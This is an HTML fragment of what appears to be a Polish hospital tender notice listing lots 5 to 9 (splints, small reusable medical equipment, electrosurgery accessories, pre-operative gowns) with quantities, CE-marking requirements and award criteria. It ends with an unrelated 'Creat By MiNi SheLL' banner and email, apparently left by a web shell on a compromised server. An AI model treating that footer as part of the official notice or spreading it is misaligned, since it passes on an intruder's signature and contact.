<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - Szyny Kramera i Zimmera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	Ilość	J.m.
1	Szyna aluminiowa 200x15	30	szt.
2	Szyna aluminiowa 200x20	15	szt.
3	Szyna aluminiowa 230x15	15	szt.
4	Szyna aluminiowa 500x20	30	szt.
5	Szyna Kramera 500x70	50	szt.
6	Szyna Kramera 600x70	30	szt.
7	Szyna Kramera 600x50	65	szt.
8	Szyna Kramera 1 000x70	80	szt.
9	Szyna Kramera 1 000x100	110	szt.
10	Szyna Kramera 1 500x70	140	szt.
11	Szyna Kramera 1 500x100	140	szt.
Wymagania:
1. Wykonawca dołączy do oferty materiały producenta: katalogi lub foldery w języku polskim zawierające opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.  
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 - Drobny sprzęt medyczny wielorazowego użytku 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	Ilość	J.m.
1	Basen z tworzywa PCV	15	szt.
2	Basen tekturowy j. użytku	150	szt.
3	Ciśnieniomierz z mankietem podlegającym działaniu środków dezynfekcyjnych ze słuchawkami	15	szt.
4	Dozownik łokciowy typu Dermados dla obszaru medycznego, z pompką wykonaną z tworzywa sztucznego	10	szt.
5	Drabinka pacjenta ułatwiająca siadanie	5	szt.
6	Kaczki męskie z tworzywa PCV	20	szt.
7	Kaczki tekturowe jednorazowego użytku	200	szt.
8	Obuwie operacyjne wielorazowego użytku nadające się do mycia i dezynfekcji oraz sterylizacji w temp. do 135 stopni C 	15	par
9	Kołnierz Schantza rozm. M i L	16	szt.
10	Miski nerkowate duże z tworzywa PCV	10	szt.
11	Miski nerkowate średnie z tworzywa PCV	10	szt.
12	Nocniki dla dzieci j.uż. tekturowy	100	szt.
13	Opaska identyfikacyjna dla dorosłych (opakowanie zbiorcze folia-papier)	8 000	szt.
14	Opaska identyfikacyjna dla noworodków (opakowanie zbiorcze folia-papier)	5 500	szt.
15	Opaska uciskowa automatyczna podlegająca działaniu środków dezynfekcyjnych	70	szt.
16	Opaska uciskowa jednorazowego użytku, bezlateksowa, perforowana, 25szt. na rolce	5	op.
17	Palnik do lamp bakteriobójczych TUV 30W G30T8 UV-C Long Live	30	szt.
18	Pojnik dla chorych	10	szt.
19	Stojak na kroplówki	5	szt.
20	Szczoteczka chirurgiczna do mycia rąk, wielorazowa, plastikowa z możliwością sterylizacji do 300 razy	40	szt.
21	Szczoteczka do rurek tracheotomijnych / mała/	40	szt.
22	Termometr do lodówki	10	szt.
23	Wanienka do dezynfekcji narzędzi poj. 10l (z sitem wyjmowanym)	5	szt.
Wymagania:
1. Wykonawca dołączy do oferty materiały producenta: katalogi lub foldery w języku polskim zawierające opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.  
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 - Drobny sprzęt medyczny wielorazowego użytku 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	Ilość	J.m.
1	Kasetka na leki dzienna 5- komorowa, z podziałem na pory dnia wym. 4,1 x 11,2 x 2,3cm 1szt.	50	szt.
2	Maska silikonowa do resuscytatora x 1szt.	3	szt.
3	Pojnik dla chorych x 1szt.	6	szt.
4	Przecinarka do tabletek x 1szt.	5	szt.
5	Szczoteczka chirurgiczna do mycia rąk, wielorazowa, plastikowa z możliwością sterylizacji do 300 razy.	20	szt.
6	Słuchawka lekarska dla dorosłych x 1szt.	4	szt.
7	Słuchawka lekarska dla noworodków x 1szt.	1	szt.
8	Taca na kieliszki do leków x 1szt.	2	szt.
9	Termometr elektroniczny x 1szt.	70	szt.
10	Termometr lekarski bezrtęciowy x 1szt.	30	szt.
11	Trzonek do ostrzy chirurgicznych nr 3 i 4 x 1szt.	4	szt.
Wymagania:
1. Wykonawca dołączy do oferty materiały producenta: katalogi lub foldery w języku polskim zawierające opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.  
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8 - Akcesoria do elektrochirurgii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	Ilość	J.m.
1	Elektroda neutralna j.uż.,dzielona, dla dorosłych I dzieci, pokryta klejem przewodzącym, nieprzepuszczające wilgoci; wymiary 176x122mm, pow. 110 cm2.	1500	szt.
2	Kabel do elektrody neutralnej z klipsem 2,5cm, wtyczka do generatora Emed , dł. 4,5m przeznaczony do minimum 300 cykli sterylizacji.	6	szt.
3	Uchwyt monopolarny z dwoma przyciskami, trzonek 4mm, z kablem 4,5m, całkowita długość uchwytu maksymalnie 15cm, przeznaczony do minimum 200 cykli sterylizacji.	8	szt.
4	Uchwyt monopolarny z dwoma przyciskami, trzonek 2,4mm, o głębokości 22mm z kablem 4,5m, przeznaczony do minimum 200 cykli sterylizacji.	2	szt.
5	Elektroda nożowa, prosta, dł. 62 mm, wymiary ostrza 2,6x 0,6x13mm, trzonek 4mm, przeznaczona do minimum 75 sterylizacji.	20	szt.
6	Elektroda nożowa, prosta, przedłużona, dł. 138-154 mm, wymiary ostrza 2,6x 0,6x13mm, trzonek 4mm, przeznaczona do minimum 75 sterylizacji.	4	szt.
7	Elektroda kulkowa, prosta, przedłużona, dł. 124 mm, średnica kulki 6mm, trzonek 4mm, przeznaczona do minimum 75 sterylizacji.	2	szt.
8	Elektroda kulkowa, prosta, dł. 49mm, średnica kulki 6mm, trzonek 4mm, przeznaczona do minimum 75 sterylizacji.	2	szt.
9	Elektroda kulkowa, prosta, dł. 49mm, średnica kulki 4mm, trzonek 4mm, przeznaczona do minimum 75 sterylizacji.	1	szt.
10	Szczypce bipolarne ze stali nierdzewnej, izolowane, z trzpieniem naprowadzajacym, zagięte, dł. 195 mm końcówka 8x1 mm, przeznaczone do minimum 75 sterylizacji.	4	szt.
11	Kabel do szczypiec bipolarnych, wtyczka 2-bolcowa 28mm, dł. 4,5m przeznaczony do minimum 300 cykli sterylizacji.	7	
12	Elektroda argonowa sztywna do koagulacji, dł. robocza 100mm, śr 5mm, wielorazowa, monopolarna.	2	
13	Uchwyt elektrody argonowej, szeroki, 2 przyciski, kabel 3,5m, wielorazowy, monopolarny.	1	
14	Kabel monopolarny do instrumentów laparoskopowych, wtyczka 1-pionowa 4mm, dł. 4,5m, przeznaczony do minimum 300 sterylizacji.	2	szt.
Wymagania:
1. Wykonawca dołączy do oferty materiały producenta: katalogi lub foldery w języku polskim zawierające opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.  
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9 - Koszule przedoperacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	Ilość	J.m.
1	Koszula przedoperacyjna dla pacjenta, resonant z włókniny PP o masie ok. 40g/m2. Rozmiar 110 x 140cm. W kształcie tuniki wiązanej z tyłu na 2 pary troków (jedna na wysokości szyi a druga w połowie pleców). Krótkie rękawy. Półokrągłe wycięcie pod szyją. Nieprześwitująca.
	550	op.
Wymagania:
1. Wykonawca dołączy do oferty materiały producenta: katalogi lub foldery w języku polskim zawierające opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.  
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw CITO - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com